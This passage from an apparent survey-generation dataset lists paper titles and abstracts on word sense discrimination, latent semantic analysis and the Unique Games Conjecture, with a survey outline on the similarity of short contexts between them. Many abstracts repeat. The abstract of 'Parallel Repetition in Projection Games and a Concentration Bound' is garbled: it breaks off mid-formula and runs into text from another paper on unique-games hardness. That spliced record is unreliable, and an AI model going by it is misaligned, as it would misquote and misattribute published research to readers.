vectors. We show that this measure compares favorably to other measures with respect to human judgments of semantic relatedness, and that it performs well when used in a word sense disambiguation algorithm that relies on semantic relatedness. This measure is flexible in that it can make comparisons between any two concepts without regard to their part of speech. In addition, it can be adapted to different domains, since any plain text corpus can be used to derive the co–occurrence information. --- paper_title: Word Sense Discrimination By Clustering Contexts In Vector And Similarity Spaces paper_content: This paper systematically compares unsupervised word sense discrimination techniques that cluster instances of a target word that occur in raw text using both vector and similarity spaces. The context of each instance is represented as a vector in a high dimensional feature space. Discrimination is achieved by clustering these context vectors directly in vector space and also by finding pairwise similarities among the vectors and then clustering in similarity space. We employ two different representations of the context in which a target word occurs. First order context vectors represent the context of each instance of a target word as a vector of features that occur in that context. Second order context vectors are an indirect representation of the context based on the average of vectors that represent the words that occur in the context. We evaluate the discriminated clusters by carrying out experiments using sense–tagged instances of 24 SENSEVAL2 words and the well known Line, Hard and Serve sense–tagged corpora. --- paper_title: Distinguishing Word Senses In Untagged Text paper_content: This paper describes an experimental comparison of three unsupervised learning algorithms that distinguish the sense of an ambiguous word in untagged text. The methods described in this paper, McQuitty's similarity analysis, Ward's minimum-variance method, and the EM algorithm, assign each instance of an ambiguous word to a known sense definition based solely on the values of automatically identifiable features in text. These methods and feature sets are found to be more successful in disambiguating nouns rather than adjectives or verbs. Overall, the most accurate of these procedures is McQuitty's similarity analysis in combination with a high dimensional feature set. --- paper_title: A web-based kernel function for measuring the similarity of short text snippets paper_content: Determining the similarity of short text snippets, such as search queries, works poorly with traditional document similarity measures (e.g., cosine), since there are often few, if any, terms in common between two short text snippets. We address this problem by introducing a novel method for measuring the similarity between short text snippets (even those without any overlapping terms) by leveraging web search results to provide greater context for the short texts. In this paper, we define such a similarity kernel function, mathematically analyze some of its properties, and provide examples of its efficacy. We also show the use of this kernel function in a large-scale system for suggesting related queries to search engine users. --- paper_title: Evaluation Of Utility Of LSA For Word Sense Discrimination paper_content: The goal of the on-going project described in this paper is evaluation of the utility of Latent Semantic Analysis (LSA) for unsupervised word sense discrimination. The hypothesis is that LSA can be used to compute context vectors for ambiguous words that can be clustered together --- with each cluster corresponding to a different sense of the word. In this paper we report first experimental result on tightness, separation and purity of sense-based clusters as a function of vector space dimensionality and using different distance metrics. --- paper_title: A solution to Plato’s problem: The latent semantic analysis theory of acquisition, induction, and representation of knowledge paper_content: How do people know as much as they do with as little information as they get? The problem takes many forms; learning vocabulary from text is an especially dramatic and convenient case for research. A new general theory of acquired similarity and knowledge representation, latent semantic analysis (LSA), is presented and used to successfully simulate such learning and several other psycholinguistic phenomena. By inducing global knowledge indirectly from local co-occurrence data in a large body of representative text, LSA acquired knowledge about the full vocabulary of English at a comparable rate to schoolchildren. LSA uses no prior linguistic or perceptual similarity knowledge; it is based solely on a general mathematical learning method that achieves powerful inductive effects by extracting the right number of dimensions (e.g., 300) to represent objects and contexts. Relations to other theories, phenomena, and problems are sketched. --- paper_title: Word Sense Discrimination By Clustering Contexts In Vector And Similarity Spaces paper_content: This paper systematically compares unsupervised word sense discrimination techniques that cluster instances of a target word that occur in raw text using both vector and similarity spaces. The context of each instance is represented as a vector in a high dimensional feature space. Discrimination is achieved by clustering these context vectors directly in vector space and also by finding pairwise similarities among the vectors and then clustering in similarity space. We employ two different representations of the context in which a target word occurs. First order context vectors represent the context of each instance of a target word as a vector of features that occur in that context. Second order context vectors are an indirect representation of the context based on the average of vectors that represent the words that occur in the context. We evaluate the discriminated clusters by carrying out experiments using sense–tagged instances of 24 SENSEVAL2 words and the well known Line, Hard and Serve sense–tagged corpora. --- paper_title: Indexing by Latent Semantic Analysis paper_content: A new method for automatic indexing and retrieval is described. The approach is to take advantage of implicit higher-order structure in the association of terms with documents (“semantic structure”) in order to improve the detection of relevant documents on the basis of terms found in queries. The particular technique used is singular-value decomposition, in which a large term by document matrix is decomposed into a set of ca. 100 orthogonal factors from which the original matrix can be approximated by linear combination. Documents are represented by ca. 100 item vectors of factor weights. Queries are represented as pseudo-document vectors formed from weighted combinations of terms, and documents with supra-threshold cosine values are returned. initial tests find this completely automatic method for retrieval to be promising. --- paper_title: A solution to Plato’s problem: The latent semantic analysis theory of acquisition, induction, and representation of knowledge paper_content: How do people know as much as they do with as little information as they get? The problem takes many forms; learning vocabulary from text is an especially dramatic and convenient case for research. A new general theory of acquired similarity and knowledge representation, latent semantic analysis (LSA), is presented and used to successfully simulate such learning and several other psycholinguistic phenomena. By inducing global knowledge indirectly from local co-occurrence data in a large body of representative text, LSA acquired knowledge about the full vocabulary of English at a comparable rate to schoolchildren. LSA uses no prior linguistic or perceptual similarity knowledge; it is based solely on a general mathematical learning method that achieves powerful inductive effects by extracting the right number of dimensions (e.g., 300) to represent objects and contexts. Relations to other theories, phenomena, and problems are sketched. --- paper_title: Using WordNet-Based Context Vectors To Estimate The Semantic Relatedness Of Concepts paper_content: In this paper, we introduce a WordNetbased measure of semantic relatedness by combining the structure and content of WordNet with co–occurrence information derived from raw text. We use the co–occurrence information along with the WordNet definitions to build gloss vectors corresponding to each concept in WordNet. Numeric scores of relatedness are assigned to a pair of concepts by measuring the cosine of the angle between their respective gloss vectors. We show that this measure compares favorably to other measures with respect to human judgments of semantic relatedness, and that it performs well when used in a word sense disambiguation algorithm that relies on semantic relatedness. This measure is flexible in that it can make comparisons between any two concepts without regard to their part of speech. In addition, it can be adapted to different domains, since any plain text corpus can be used to derive the co–occurrence information. ---
Title: Computational Approaches to Measuring the Similarity of Short Contexts: A Review of Applications and Methods Section 1: Introduction Description 1: Overview of short written contexts, their importance, and why measuring their similarity poses a challenge. Section 2: Similar Contexts Description 2: Explanation of how similarity between concepts is defined and its application to short contexts. Section 3: Types of Short Contexts Description 3: Differentiation between headed and headless short contexts, including their characteristics and applications. Section 4: Examples of Headed Contexts Description 4: Illustration of how headed contexts can be used for word sense discrimination and name discrimination with specific examples. Section 5: Examples of Headless Contexts Description 5: Demonstration of how headless contexts are utilized by examining specific examples and discussing their broader applications. Section 6: Applications Description 6: Discussion on various problems that can be solved by identifying similar short contexts, including both headed and headless applications. Section 7: Headless Applications Description 7: Examination of different forms of headless contexts and their practical applications, such as automated grading and content filtering. Section 8: Pair-wise Comparison of Headless Contexts to Reference Samples Description 8: Overview of how headless contexts can be compared to reference samples in various applications like plagiarism detection and automated grading. Section 9: Clustering N Headless Contexts Description 9: Methods for clustering headless short contexts for organization and classification, including specific use cases. Section 10: Headed / Target Word Applications Description 10: Discussion on applications that focus on target words within contexts, including word sense disambiguation and name discrimination. Section 11: Pair-wise Comparison of Headed Contexts to Reference Samples Description 11: Analysis of how headed contexts are compared to reference samples to perform tasks like word sense disambiguation. Section 12: Clustering N Headed Contexts Description 12: Overview of clustering methods for headed short contexts to determine underlying meanings or senses of target words. Section 13: Summary of Applications Description 13: Summary of various applications of identifying similar short contexts and how different methods can approach these problems. Section 14: First-order Similarity Description 14: Explanation of first-order similarity methods based on word matching and their limitations. Section 15: Second-order Similarity Description 15: Introduction to second-order similarity methods using word vectors and their benefits over first-order methods. Section 16: Word Vectors Description 16: Description of how word vectors are constructed and used in second-order similarity methods. Section 17: Micro View of Context Description 17: In-depth look at the micro view of context involving local co-occurrences of words. Section 18: Macro View of Context Description 18: Examination of the macro view of context involving categorization based on the types of contexts where a word appears. Section 19: Context as an Average of Word Vectors Description 19: Methodology for representing short contexts as averages of word vectors and the advantages it provides for similarity measurement. Section 20: Conclusion Description 20: Summary of the discussed methods for measuring the similarity of short contexts and their practical implications.
On the Unique Games Conjecture (Invited Survey)
12
--- paper_title: On the power of unique 2-prover 1-round games paper_content: A 2-prover game is called unique if the answer of one prover uniquely determines the answer of the second prover and vice versa (we implicitly assume games to be one round games). The value of a 2-prover game is the maximum acceptance probability of the verifier over all the prover strategies. We make a conjecture regarding the power of unique 2-prover games, which we call the Unique Games Conjecture. --- paper_title: On the power of unique 2-prover 1-round games paper_content: A 2-prover game is called unique if the answer of one prover uniquely determines the answer of the second prover and vice versa (we implicitly assume games to be one round games). The value of a 2-prover game is the maximum acceptance probability of the verifier over all the prover strategies. We make a conjecture regarding the power of unique 2-prover games, which we call the Unique Games Conjecture. --- paper_title: Some optimal inapproximability results paper_content: We prove optimal, up to an arbitrary e > 0, inapproximability results for Max-E k-Sat for k ≥ 3, maximizing the number of satisfied linear equations in an over-determined system of linear equations modulo a prime p and Set Splitting. As a consequence of these results we get improved lower bounds for the efficient approximability of many optimization problems studied previously. In particular, for Max-E2-Sat, Max-Cut, Max-di-Cut, and Vertex cover. --- paper_title: Limit theorems for polylinear forms paper_content: The limit theorems for polylinear forms are obtained. Conditions are found under which the distribution of the polylinear form of many random variables is essentially the same as if all the distributions of arguments were normal. --- paper_title: Inapproximability of NP-complete problems, discrete fourier analysis, and geometry paper_content: This article gives a survey of recent results that connect three areas in com- puter science and mathematics: (1) (Hardness of) computing approximate solutions to NP-complete problems. (2) Fourier analysis of boolean functions on boolean hypercube. (3) Certain problems in geometry, especially related to isoperimetry and embeddings between metric spaces. --- paper_title: Optimal algorithms and inapproximability results for every CSP? paper_content: Semidefinite Programming(SDP) is one of the strongest algorithmic techniques used in the design of approximation algorithms. In recent years, Unique Games Conjecture(UGC) has proved to be intimately connected to the limitations of Semidefinite Programming. Making this connection precise, we show the following result : If UGC is true, then for every constraint satisfaction problem(CSP) the best approximation ratio is given by a certain simple SDP. Specifically, we show a generic conversion from SDP integrality gaps to UGC hardness results for every CSP. This result holds both for maximization and minimization problems over arbitrary finite domains. Using this connection between integrality gaps and hardness results we obtain a generic polynomial-time algorithm for all CSPs. Assuming the Unique Games Conjecture, this algorithm achieves the optimal approximation ratio for every CSP. Unconditionally, for all 2-CSPs the algorithm achieves an approximation ratio equal to the integrality gap of a natural SDP used in literature. Further the algorithm achieves at least as good an approximation ratio as the best known algorithms for several problems like MaxCut, Max2Sat, MaxDiCut and Unique Games. --- paper_title: Inapproximability of Combinatorial Optimization Problems paper_content: We survey results on the hardness of approximating combinatorial optimization problems. --- paper_title: The Unique Games Conjecture, Integrality Gap for Cut Problems and Embeddability of Negative Type Metrics into ℓ1 paper_content: In this paper, we disprove a conjecture of Goemans and Linial; namely, that every negative type metric embeds into $\ell_1$ with constant distortion. We show that for an arbitrarily small constant $\delta> 0$, for all large enough $n$, there is an $n$-point negative type metric which requires distortion at least $(\log\log n)^{1/6-\delta}$ to embed into $\ell_1.$ ::: Surprisingly, our construction is inspired by the Unique Games Conjecture (UGC) of Khot, establishing a previously unsuspected connection between probabilistically checkable proof systems (PCPs) and the theory of metric embeddings. We first prove that the UGC implies a super-constant hardness result for the (non-uniform) Sparsest Cut problem. Though this hardness result relies on the UGC, we demonstrate, nevertheless, that the corresponding PCP reduction can be used to construct an "integrality gap instance" for Sparsest Cut. Towards this, we first construct an integrality gap instance for a natural SDP relaxation of Unique Games. Then we "simulate" the PCP reduction and "translate" the integrality gap instance of Unique Games to an integrality gap instance of Sparsest Cut. This enables us to prove a $(\log \log n)^{1/6-\delta}$ integrality gap for Sparsest Cut, which is known to be equivalent to the metric embedding lower bound. --- paper_title: Noise stability of functions with low influences: Invariance and optimality paper_content: In this paper we study functions with low influences on product probability spaces. The analysis of boolean functions with low influences has become a central problem in discrete Fourier analysis. It is motivated by fundamental questions arising from the construction of probabilistically checkable proofs in theoretical computer science and from problems in the theory of social choice in economics. ::: We prove an invariance principle for multilinear polynomials with low influences and bounded degree; it shows that under mild conditions the distribution of such polynomials is essentially invariant for all product spaces. Ours is one of the very few known non-linear invariance principles. It has the advantage that its proof is simple and that the error bounds are explicit. We also show that the assumption of bounded degree can be eliminated if the polynomials are slightly ``smoothed''; this extension is essential for our applications to ``noise stability''-type problems. ::: In particular, as applications of the invariance principle we prove two conjectures: the ``Majority Is Stablest'' conjecture from theoretical computer science, which was the original motivation for this work, and the ``It Ain't Over Till It's Over'' conjecture from social choice theory. --- paper_title: L_1 embeddings of the Heisenberg group and fast estimation of graph isoperimetry paper_content: We survey connections between the theory of bi-Lipschitz embeddings and the Sparsest Cut Problem in combinatorial optimization. The story of the Sparsest Cut Problem is a striking example of the deep interplay between analysis, geometry, and probability on the one hand, and computational issues in discrete mathematics on the other. We explain how the key ideas evolved over the past 20 years, emphasizing the interactions with Banach space theory, geometric measure theory, and geometric group theory. As an important illustrative example, we shall examine recently established connections to the the structure of the Heisenberg group, and the incompatibility of its Carnot-Carath\'eodory geometry with the geometry of the Lebesgue space $L_1$. --- paper_title: O(√log n) approximation algorithms for min UnCut, min 2CNF deletion, and directed cut problems paper_content: We give O(√log n)-approximation algorithms for the MIN UNCUT, MIN 2CNF DELETION, DIRECTED BALANCED SEPERATOR, and DIRECTED SPARSEST CUT problems. The previously best known algorithms give an O(log n)-approximation for MIN UNCUT [9], DIRECTED BALANCED SEPERATOR [17], DIRECTED SPARSEST CUT [17], and an O(log n log log n)-approximation for MIN 2CNF DELETION [14].We also show that the integrality gap of an SDP relaxation of the MINIMUM MULTICUT problem is Ω(log n). --- paper_title: Proof verification and the hardness of approximation problems paper_content: We show that every language in NP has a probablistic verifier that checks membership proofs for it using logarithmic number of random bits and by examining a constant number of bits in the proof. If a string is in the language, then there exists a proof such that the verifier accepts with probability 1 (i.e., for every choice of its random string). For strings not in the language, the verifier rejects every provided “proof” with probability at least 1/2. Our result builds upon and improves a recent result of Arora and Safra [1998] whose verifiers examine a nonconstant number of bits in the proof (though this number is a very slowly growing function of the input length). ::: As a consequence, we prove that no MAX SNP-hard problem has a polynomial time approximation scheme, unless NP = P. The class MAX SNP was defined by Papadimitriou and Yannakakis [1991] and hard problems for this class include vertex cover, maximum satisfiability, maximum cut, metric TSP, Steiner trees and shortest superstring. We also improve upon the clique hardness results of Feige et al. [1996] and Arora and Safra [1998] and show that there exists a positive ε such that approximating the maximum clique size in an N-vertex graph to within a factor of Nε is NP-hard. --- paper_title: Probabilistic checking of proofs: a new characterization of NP paper_content: We give a new characterization of NP: the class NP contains exactly those languages <italic>L</italic> for which membership proofs (a proof that an input <italic>x</italic> is in <italic>L</italic>) can be verified probabilistically in polynomial time using <italic>logarithmic</italic> number of random bits and by reading <italic>sublogarithmic</italic> number of bits from the proof. ::: We discuss implications of this characterization; specifically, we show that approximating Clique and Independent Set, even in a very weak sense, is NP-hard. --- paper_title: Interactive proofs and the hardness of approximating cliques paper_content: The contribution of this paper is two-fold. First, a connection is established between approximating the size of the largest clique in a graph and multi-prover interactive proofs. Second, an efficient multi-prover interactive proof for NP languages is constructed, where the verifier uses very few random bits and communication bits. Last, the connection between cliques and efficient multi-prover interaction proofs, is shown to yield hardness results on the complexity of approximating the size of the largest clique in a graph. Of independent interest is our proof of correctness for the multilinearity test of functions. --- paper_title: O(√log n) approximation algorithms for min UnCut, min 2CNF deletion, and directed cut problems paper_content: We give O(√log n)-approximation algorithms for the MIN UNCUT, MIN 2CNF DELETION, DIRECTED BALANCED SEPERATOR, and DIRECTED SPARSEST CUT problems. The previously best known algorithms give an O(log n)-approximation for MIN UNCUT [9], DIRECTED BALANCED SEPERATOR [17], DIRECTED SPARSEST CUT [17], and an O(log n log log n)-approximation for MIN 2CNF DELETION [14].We also show that the integrality gap of an SDP relaxation of the MINIMUM MULTICUT problem is Ω(log n). --- paper_title: Some optimal inapproximability results paper_content: We prove optimal, up to an arbitrary e > 0, inapproximability results for Max-E k-Sat for k ≥ 3, maximizing the number of satisfied linear equations in an over-determined system of linear equations modulo a prime p and Set Splitting. As a consequence of these results we get improved lower bounds for the efficient approximability of many optimization problems studied previously. In particular, for Max-E2-Sat, Max-Cut, Max-di-Cut, and Vertex cover. --- paper_title: Economical toric spines via Cheeger's Inequality paper_content: Let $G_{\infty}=(C_m^d)_{\infty}$ denote the graph whose set of vertices is $\{1,..., m\}^d$, where two distinct vertices are adjacent iff they are either equal or adjacent in $C_m$ in each coordinate. Let $G_{1}=(C_m^d)_1$ denote the graph on the same set of vertices in which two vertices are adjacent iff they are adjacent in one coordinate in $C_m$ and equal in all others. Both graphs can be viewed as graphs of the $d$-dimensional torus. We prove that one can delete $O(\sqrt d m^{d-1})$ vertices of $G_1$ so that no topologically nontrivial cycles remain. This improves an $O(d^{\log_2 (3/2)}m^{d-1})$ estimate of Bollob\'as, Kindler, Leader and O'Donnell. We also give a short proof of a result implicit in a recent paper of Raz: one can delete an $O(\sqrt d/m)$ fraction of the edges of $G_{\infty}$ so that no topologically nontrivial cycles remain in this graph. Our technique also yields a short proof of a recent result of Kindler, O'Donnell, Rao and Wigderson; there is a subset of the continuous $d$-dimensional torus of surface area $O(\sqrt d)$ that intersects all nontrivial cycles. All proofs are based on the same general idea: the consideration of random shifts of a body with small boundary and no- nontrivial cycles, whose existence is proved by applying the isoperimetric inequality of Cheeger or its vertex or edge discrete analogues. --- paper_title: Optimization, approximation, and complexity classes paper_content: We define a natural variant of NP, MAX NP , and also a subclass called MAX SNP . These are classes of optimization problems, and in fact contain several natural, well-studied ones. We show that problems in these classes can be approximated with some bounded error. Furthermore, we show that a number of common optimization problems are complete under a kind of careful transformation (called L - reduction ) that preserves approximability. It follows that such a complete problem has a polynomial-time approximation scheme iff the whole class does. These results may help explain the lack of progress on the approximability of a host of optimization problems. --- paper_title: Hardness of approximate hypergraph coloring paper_content: We introduce the notion of covering complexity of a probabilistic verifier. The covering complexity of a verifier on a given input is the minimum number of proofs needed to "satisfy" the verifier on every random string, i.e., on every random string, at least one of the given proofs must be accepted by the verifier. The covering complexity of PCP verifiers offers a promising route to getting stronger inapproximability results for some minimization problems, and in particular (hyper)-graph coloring problems. We present a PCP verifier for NP statements that queries only four bits and yet has a covering complexity of one for true statements and a super-constant covering complexity for statements not in the language. Moreover the acceptance predicate of this verifier is a simple Not-all-Equal check on the four bits it reads. This enables us to prove that for any constant c, it is NP-hard to color a 2-colorable 4-uniform hypergraph using just c colors, and also yields a super-constant inapproximability result under a stronger hardness assumption. --- paper_title: Some optimal inapproximability results paper_content: We prove optimal, up to an arbitrary e > 0, inapproximability results for Max-E k-Sat for k ≥ 3, maximizing the number of satisfied linear equations in an over-determined system of linear equations modulo a prime p and Set Splitting. As a consequence of these results we get improved lower bounds for the efficient approximability of many optimization problems studied previously. In particular, for Max-E2-Sat, Max-Cut, Max-di-Cut, and Vertex cover. --- paper_title: Hardness of approximate hypergraph coloring paper_content: We introduce the notion of covering complexity of a probabilistic verifier. The covering complexity of a verifier on a given input is the minimum number of proofs needed to "satisfy" the verifier on every random string, i.e., on every random string, at least one of the given proofs must be accepted by the verifier. The covering complexity of PCP verifiers offers a promising route to getting stronger inapproximability results for some minimization problems, and in particular (hyper)-graph coloring problems. We present a PCP verifier for NP statements that queries only four bits and yet has a covering complexity of one for true statements and a super-constant covering complexity for statements not in the language. Moreover the acceptance predicate of this verifier is a simple Not-all-Equal check on the four bits it reads. This enables us to prove that for any constant c, it is NP-hard to color a 2-colorable 4-uniform hypergraph using just c colors, and also yields a super-constant inapproximability result under a stronger hardness assumption. --- paper_title: Some optimal inapproximability results paper_content: We prove optimal, up to an arbitrary e > 0, inapproximability results for Max-E k-Sat for k ≥ 3, maximizing the number of satisfied linear equations in an over-determined system of linear equations modulo a prime p and Set Splitting. As a consequence of these results we get improved lower bounds for the efficient approximability of many optimization problems studied previously. In particular, for Max-E2-Sat, Max-Cut, Max-di-Cut, and Vertex cover. --- paper_title: On the power of unique 2-prover 1-round games paper_content: A 2-prover game is called unique if the answer of one prover uniquely determines the answer of the second prover and vice versa (we implicitly assume games to be one round games). The value of a 2-prover game is the maximum acceptance probability of the verifier over all the prover strategies. We make a conjecture regarding the power of unique 2-prover games, which we call the Unique Games Conjecture. --- paper_title: Inapproximability Results for Sparsest Cut, Optimal Linear Arrangement, and Precedence Constrained Scheduling paper_content: We consider (uniform) sparsest cut, optimal linear arrangement and the precedence constrained scheduling problem 1 |prec| SigmawjCj-So far, these three notorious NP-hard problems have resisted all attempts to prove inapproximability results. We show that they have no polynomial time approximation scheme (PTAS), unless NP-complete pmblems can be solved in randomized subexponential time. Furthermore, we prove that the scheduling problem is as-hard to approximate as vertex cover when the so-called fixed cost, that is present in all feasible solutions, is subtracted from the objective function. --- paper_title: Some optimal inapproximability results paper_content: We prove optimal, up to an arbitrary e > 0, inapproximability results for Max-E k-Sat for k ≥ 3, maximizing the number of satisfied linear equations in an over-determined system of linear equations modulo a prime p and Set Splitting. As a consequence of these results we get improved lower bounds for the efficient approximability of many optimization problems studied previously. In particular, for Max-E2-Sat, Max-Cut, Max-di-Cut, and Vertex cover. --- paper_title: Inapproximability of NP-complete problems, discrete fourier analysis, and geometry paper_content: This article gives a survey of recent results that connect three areas in com- puter science and mathematics: (1) (Hardness of) computing approximate solutions to NP-complete problems. (2) Fourier analysis of boolean functions on boolean hypercube. (3) Certain problems in geometry, especially related to isoperimetry and embeddings between metric spaces. --- paper_title: On the power of unique 2-prover 1-round games paper_content: A 2-prover game is called unique if the answer of one prover uniquely determines the answer of the second prover and vice versa (we implicitly assume games to be one round games). The value of a 2-prover game is the maximum acceptance probability of the verifier over all the prover strategies. We make a conjecture regarding the power of unique 2-prover games, which we call the Unique Games Conjecture. --- paper_title: Optimal inapproximability results for MAX-CUT and other 2-variable CSPs? paper_content: In this paper, we give evidence suggesting that MAX-CUT is NP-hard to approximate to within a factor of /spl alpha//sub cw/+ /spl epsi/, for all /spl epsi/ > 0, where /spl alpha//sub cw/ denotes the approximation ratio achieved by the Goemans-Williamson algorithm (1995). /spl alpha//sub cw/ /spl ap/ .878567. This result is conditional, relying on two conjectures: a) the unique games conjecture of Khot; and, b) a very believable conjecture we call the majority is stablest conjecture. These results indicate that the geometric nature of the Goemans-Williamson algorithm might be intrinsic to the MAX-CUT problem. The same two conjectures also imply that it is NP-hard to (/spl beta/ + /spl epsi/)-approximate MAX-2SAT, where /spl beta/ /spl ap/ .943943 is the minimum of (2 + (2//spl pi/) /spl theta/)/(3 - cos(/spl theta/)) on (/spl pi//2, /spl pi/). Motivated by our proof techniques, we show that if the MAX-2CSP and MAX-2SAT problems are slightly restricted - in a way that seems to retain all their hardness -then they have (/spl alpha//sub GW/-/spl epsi/)- and (/spl beta/ - /spl epsi/)-approximation algorithms, respectively. Though we are unable to prove the majority is stablest conjecture, we give some partial results and indicate possible directions of attack. Our partial results are enough to imply that MAX-CUT is hard to (3/4 + 1/(2/spl pi/) + /spl epsi/)-approximate (/spl ap/ .909155), assuming only the unique games conjecture. We also discuss MAX-2CSP problems over non-Boolean domains and state some related results and conjectures. We show, for example, that the unique games conjecture implies that it is hard to approximate MAX-2LIN(q) to within any constant factor. --- paper_title: How good is the Goemans-Williamson MAX CUT algorithm? paper_content: The celebrated semidefinite programming algorithm for MAX CUT introduced by Goemans and Williamson was known to have a performance ratio of at least α = 2 π min0<θ≤π θ 1−cos θ (0.87856 < α < 0.87857); the exact performance ratio was unknown. We prove that the performance ratio of their algorithm is exactly α. Furthermore, we show that it is impossible to add valid linear constraints to improve the performance ratio. --- paper_title: On the integrality ratio of semidefinite relaxations of MAX CUT paper_content: MAX CUT is the problem of partitioning the vertices of a graph into two sets, maximizing the number of edges joining these sets. This problem is NP-hard. Goemans and Williamson proposed an algorithm that first uses a semidefinite programming relaxation of MAX CUT to embed the vertices of the graph on the surface of an n dimensional sphere, and then uses a random hyperplane to cut the sphere in two, giving a cut of the graph. They show that the expected number of edges in the random cut is at least α \cdot sdp, where α \simeq 0.87856 and sdp is the value of the semidefinite program. This manuscript shows the following results: 1. The integrality ratio of the semidefinite program is α. The previously known bound on theintegrality ratio was roughly 0.8845. 2. In the presence of the so called “triangle constraints”, the integrality ratio is no better than roughly 0.891. The previously known bound was above 0.95. --- paper_title: Parallel Repetition in Projection Games and a Concentration Bound paper_content: A two-player game is played by cooperating players who are not allowed to communicate. A referee asks the players questions sampled from some known distribution and decides whether they win or not based on a known predicate of the questions and the players' answers. The parallel repetition of the game is the game in which the referee samples $n$ independent pairs of questions and sends the corresponding questions to the players simultaneously. If the players cannot win the original game with probability better than $(1-\epsilon)$, what's the best they can do in the repeated game? We improve earlier results of [R. Raz, SIAM J. Comput., 27 (1998), pp. 763-803] and [T. Holenstein, Theory Comput., 5 (2009), pp. 141-172], who showed that the players cannot win all copies in the repeated game with probability better than $(1-\epsilon/2)^{\Omega(n\epsilon^2/c)}$ (here $c$ is the length of the answers in the game), in the following ways: (i) We show that the probability of winning all copies is $(1-\epsilon/2)^{\Omega(\epsilon n)}$ as long as the game is a “projection game,” the type of game most commonly used in hardness of approximation results. (ii) We prove a concentration bound for parallel repetition (of general games) showing that for any constant $0 0$, there exists an alphabet size $M(\epsilon)$ for which it is NP-hard to distinguish a unique game with alphabet size $M$ in which a $(1-\epsilon^2)$ fraction of the constraints can be satisfied from one in which a $(1-\epsilon f(1/\epsilon))$ fraction of the constraints can be satisfied. --- paper_title: Optimal inapproximability results for MAX-CUT and other 2-variable CSPs? paper_content: In this paper, we give evidence suggesting that MAX-CUT is NP-hard to approximate to within a factor of /spl alpha//sub cw/+ /spl epsi/, for all /spl epsi/ > 0, where /spl alpha//sub cw/ denotes the approximation ratio achieved by the Goemans-Williamson algorithm (1995). /spl alpha//sub cw/ /spl ap/ .878567. This result is conditional, relying on two conjectures: a) the unique games conjecture of Khot; and, b) a very believable conjecture we call the majority is stablest conjecture. These results indicate that the geometric nature of the Goemans-Williamson algorithm might be intrinsic to the MAX-CUT problem. The same two conjectures also imply that it is NP-hard to (/spl beta/ + /spl epsi/)-approximate MAX-2SAT, where /spl beta/ /spl ap/ .943943 is the minimum of (2 + (2//spl pi/) /spl theta/)/(3 - cos(/spl theta/)) on (/spl pi//2, /spl pi/). Motivated by our proof techniques, we show that if the MAX-2CSP and MAX-2SAT problems are slightly restricted - in a way that seems to retain all their hardness -then they have (/spl alpha//sub GW/-/spl epsi/)- and (/spl beta/ - /spl epsi/)-approximation algorithms, respectively. Though we are unable to prove the majority is stablest conjecture, we give some partial results and indicate possible directions of attack. Our partial results are enough to imply that MAX-CUT is hard to (3/4 + 1/(2/spl pi/) + /spl epsi/)-approximate (/spl ap/ .909155), assuming only the unique games conjecture. We also discuss MAX-2CSP problems over non-Boolean domains and state some related results and conjectures. We show, for example, that the unique games conjecture implies that it is hard to approximate MAX-2LIN(q) to within any constant factor. --- paper_title: Conditional hardness for approximate coloring paper_content: We study the AprxColoring$(q,Q)$ problem: Given a graph $G$, decide whether $\chi(G)\le q$ or $\chi(G)\ge Q$. We present hardness results for this problem for any constants $3\le q<Q$. For $q\ge4$, our result is based on Khot's 2-to-1 label cover, which is conjectured to be NP-hard [S. Khot, Proceedings of the 34th Annual ACM Symposium on Theory of Computing, 2002, pp. 767-775]. For $q=3$, we base our hardness result on a certain “${\rhd\hskip-0.5em<}$-shaped” variant of his conjecture. Previously no hardness result was known for $q=3$ and $Q\ge6$. At the heart of our proof are tight bounds on generalized noise-stability quantities, which extend the recent work of Mossel, O'Donnell, and Oleszkiewicz [“Noise stability of functions with low influences: Invariance and optimality,” Ann. of Math. (2), to appear] and should have wider applicability. --- paper_title: New approximation guarantee for chromatic number paper_content: We describe how to color every 3-colorable graph with O(n0.2111) colors, thus improving an algorithm of Blum and Karger from almost a decade ago. Our analysis uses new geometric ideas inspired by the recent work of Arora, Rao, and Vazirani on SPARSEST CUT, and these ideas show promise of leading to further improvements. --- paper_title: Inapproximability of NP-complete problems, discrete fourier analysis, and geometry paper_content: This article gives a survey of recent results that connect three areas in com- puter science and mathematics: (1) (Hardness of) computing approximate solutions to NP-complete problems. (2) Fourier analysis of boolean functions on boolean hypercube. (3) Certain problems in geometry, especially related to isoperimetry and embeddings between metric spaces. --- paper_title: On the power of unique 2-prover 1-round games paper_content: A 2-prover game is called unique if the answer of one prover uniquely determines the answer of the second prover and vice versa (we implicitly assume games to be one round games). The value of a 2-prover game is the maximum acceptance probability of the verifier over all the prover strategies. We make a conjecture regarding the power of unique 2-prover games, which we call the Unique Games Conjecture. --- paper_title: Approximation Resistant Predicates from Pairwise Independence paper_content: We study the approximability of predicates on k variables from a domain [q], and give a new sufficient condition for such predicates to be approximation resistant under the Unique Games Conjecture. ... --- paper_title: Gowers uniformity, influence of variables, and PCPs paper_content: Gowers introduced, for d\geq 1, the notion of dimension-d uniformity U^d(f) of a function f: G -> \C, where G is a finite abelian group and \C are the complex numbers. Roughly speaking, if U^d(f) is small, then f has certain "pseudorandomness" properties. ::: We prove the following property of functions with large U^d(f). Write G=G_1 x >... x G_n as a product of groups. If a bounded balanced function f:G_1 x ... x G_n -> \C is such that U^{d} (f) > epsilon, then one of the coordinates of f has influence at least epsilon/2^{O(d)}. ::: The Gowers inner product of a collection of functions is a related notion of pseudorandomness. We prove that if a collection of bounded functions has large Gowers inner product, and at least one function in the collection is balanced, then there is a variable that has high influence for at least four of the functions in the collection. ::: Finally, we relate the acceptance probability of the "hypergraph long-code test" proposed by Samorodnitsky and Trevisan to the Gowers inner product of the functions being tested and we deduce applications to the construction of Probabilistically Checkable Proofs and to hardness of approximation. --- paper_title: Optimal algorithms and inapproximability results for every CSP? paper_content: Semidefinite Programming(SDP) is one of the strongest algorithmic techniques used in the design of approximation algorithms. In recent years, Unique Games Conjecture(UGC) has proved to be intimately connected to the limitations of Semidefinite Programming. Making this connection precise, we show the following result : If UGC is true, then for every constraint satisfaction problem(CSP) the best approximation ratio is given by a certain simple SDP. Specifically, we show a generic conversion from SDP integrality gaps to UGC hardness results for every CSP. This result holds both for maximization and minimization problems over arbitrary finite domains. Using this connection between integrality gaps and hardness results we obtain a generic polynomial-time algorithm for all CSPs. Assuming the Unique Games Conjecture, this algorithm achieves the optimal approximation ratio for every CSP. Unconditionally, for all 2-CSPs the algorithm achieves an approximation ratio equal to the integrality gap of a natural SDP used in literature. Further the algorithm achieves at least as good an approximation ratio as the best known algorithms for several problems like MaxCut, Max2Sat, MaxDiCut 